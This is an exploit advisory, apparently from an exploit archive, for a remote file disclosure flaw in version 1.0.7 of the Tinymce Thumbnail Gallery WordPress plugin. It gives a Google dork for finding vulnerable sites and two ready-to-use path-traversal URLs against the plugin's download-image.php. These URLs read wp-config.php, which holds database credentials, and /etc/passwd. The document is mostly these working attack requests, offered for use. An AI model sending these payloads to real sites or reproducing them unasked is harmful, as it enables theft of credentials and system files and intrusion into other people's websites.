id: 18493
date: 06/07/2012
title: Wordpress Plugins - Tinymce Thumbnail Gallery Remote File Disclosure
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - Tinymce Thumbnail Gallery Remote File Disclosure Vulnerability
# Version : 1.0.7
# Link : http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
# Plugins : http://downloads.wordpress.org/plugin/tinymce-thumbnail-gallery.zip
# Google Dork : inurl:/wp-content/plugins/tinymce-thumbnail-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../../../../../etc/passwd



#  0day.today [2023-03-23]  #